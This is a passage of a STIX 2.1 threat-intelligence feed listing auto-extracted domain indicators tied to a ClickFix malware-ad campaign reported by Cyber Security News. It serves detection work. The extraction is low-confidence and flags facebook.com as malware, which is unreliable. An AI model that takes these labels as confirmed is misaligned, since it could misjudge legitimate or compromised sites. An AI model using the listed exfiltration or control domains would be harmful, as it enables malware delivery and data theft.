News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5167833c-0440-44c7-938c-ec99643fb611","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cli-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: tes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[","pattern":"[domain-name:value = 'cli-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d91bc074-4195-48e7-a792-fbfd6bcbbe07","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cli-guides.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]c","pattern":"[domain-name:value = 'cli-guides.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8625513a-83f9-4793-a496-9af7d49d7c06","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cli-stack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-comm","pattern":"[domain-name:value = 'cli-stack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9b769606-29a8-4d37-8088-8b10d5d89726","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: clveeragent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cos","pattern":"[domain-name:value = 'clveeragent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f2ec2246-8661-4833-9d92-00376d69ebb5","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cmux-lab.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; c","pattern":"[domain-name:value = 'cmux-lab.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60ed682b-c9dd-44af-a77a-11b28602b7f4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: code-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: raft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account g","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a586fd55-1262-4677-ad2d-150784dfe9f0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: codex-craft.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: nts using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-des","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c83de8ab-ea74-4a6e-bda1-503c65ab61ed","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: codex-notes.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-des","pattern":"[domain-name:value = 'codex-notes.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6fdb8e7d-75ba-4d74-974d-c9213a978458","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: codex-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com;","pattern":"[domain-name:value = 'codex-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a8d3d59-0d19-4b02-8568-e2fa5efcc396","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: congiagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; ce","pattern":"[domain-name:value = 'congiagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5a61aa54-7c43-4749-b30d-5a7f4e5d5d88","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cosimcagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com;","pattern":"[domain-name:value = 'cosimcagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dbc69eee-15ce-4f54-91ba-c2023e2c42e2","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: crisp-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: abar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]c","pattern":"[domain-name:value = 'crisp-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60c24e2f-8f6c-4d74-8d3e-7a488f6d7c06","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: denverplumbingandwaterheater.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: vmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellare","pattern":"[domain-name:value = 'denverplumbingandwaterheater.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--22e4ee7d-09b6-48ab-aaf0-91691d819d8d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: desktop-version.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com; oakenfjrod[.]ru Windows staging domains Domain sic180[.]","pattern":"[domain-name:value = 'desktop-version.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5f0fa907-52eb-464b-9af8-01d924246b8a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: dogtrainersgeorgia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: dscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumbingandwaterheater[.]com; restoremental[.]com;","pattern":"[domain-name:value = 'dogtrainersgeorgia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d3a4a64c-1dad-47ff-a090-d28e418a1e95","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ember-bridge.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com macOS loader-delivery domains Domain weaveridge7[.]com; ember-bridge[.]com; rudder-moss[.]com; wuess[.]com September macOS telemetry","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--85b5a31f-de1f-4688-9e38-76310cd3984d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: facebook.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: 3 Amatera direct-to-IP TLS command-and-control server using facebook[.]com SNI IP address 165.22.199[.]85 September macOS telemetry","pattern":"[domain-name:value = 'facebook.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d0da00ea-460e-4551-b876-cfe5ab4d841c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: fern-plume.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: y and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov","pattern":"[domain-name:value = 'fern-plume.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2fb65a06-ea44-4853-8ff4-c41848710b60","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: filequanticore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ss 38.244.158[.]56 AMOS helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbo","pattern":"[domain-name:value = 'filequanticore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--06d249cb-4702-4a42-b3b9-6be172fc8b35","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: filesiriuscore.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: S helper /contact exfiltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; brigh","pattern":"[domain-name:value = 'filesiriuscore.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9bb36296-f991-441e-b90e-079f287f89e0","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: flutelikelurkerunsinewy.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; clean-disk-guide[.]com Copied-command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain","pattern":"[domain-name:value = 'flutelikelurkerunsinewy.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3a089b81-f9a2-4f1b-a6f7-4b2888fded25","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: gatemaden.space","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ntal[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and","pattern":"[domain-name:value = 'gatemaden.space']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--94f07a89-76b6-4b34-86b1-3f31bbd83e5f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: getnova.top","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub[.]top; nova-la","pattern":"[domain-name:value = 'getnova.top']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--832356bd-067c-4f16-8de5-7abf76386359","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: gigappyworld.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales","pattern":"[domain-name:value = 'gigappyworld.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ad1ea4cc-17ee-4130-8f74-88a661393c65","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: glowmedaesthetics.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; denverplumbingandwaterheater[.]com; restoremental[.]com; glowmedaesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]","pattern":"[domain-name:value = 'glowmedaesthetics.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5625dfdc-0d7d-412b-af8d-766138767919","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: glrack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: and tasking domains Domain loop-lumen[.]com; umapla[.]com; glrack[.]com Fake wallet delivery domains Domain desktop-version[.]com","pattern":"[domain-name:value = 'glrack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d3a5c8cf-77e1-44e0-849b-e4ae233a2309","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: gogolfonline.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: kestone[.]com; gigappyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]co","pattern":"[domain-name:value = 'gogolfonline.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6752e598-5980-4f24-b8b4-afc137a48c5b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: grove-12.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com","pattern":"[domain-name:value = 'grove-12.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9ed02393-0b38-4970-b6bb-0907efc3d80a","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: habar55.namebright.bike","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: akenfjrod[.]ru Windows staging domains Domain sic180[.]com; habar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli","pattern":"[domain-name:value = 'habar55.namebright.bike']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3fd1d6f2-95a1-445c-932a-5c9885aab250","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: harbor-29.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; grove-12[.]com; vers","pattern":"[domain-name:value = 'harbor-29.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0b42a91-b3b5-46e0-9fd5-fa9bc6b27c41","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account gave the actors a trusted advert","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dc66361c-7251-43c3-9874-f12311614002","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.app","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: blocked. Ads included 40 streaming-themed placements using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c36f718e-933d-4205-bacc-a8fbaec652f3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.us","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rs run attacker code. The fraudulent landing page hosted at hbomaxx[.]us (Source – HudsonRock) The operators moved quickly as doma","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9df1689c-692e-406f-bb54-9d765b5516bf","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbubagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: arbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com;","pattern":"[domain-name:value = 'hbubagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92a21a7b-d112-4934-a3c4-7b4daf07aaeb","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: heroestales.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: pyworld[.]com; microsoftupdater[.]info; gogolfonline[.]com; heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]co","pattern":"[domain-name:value = 'heroestales.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be68d36a-7b96-47d4-8223-f8cbd092c175","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: homebrwmac-hub.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: adesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-command lure domains Domai","pattern":"[domain-name:value = 'homebrwmac-hub.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1d464172-bd99-4162-9b21-0951cf077c1f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: houstongaragedoorinstallers.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com September macOS telemetry and delivery domains Domain 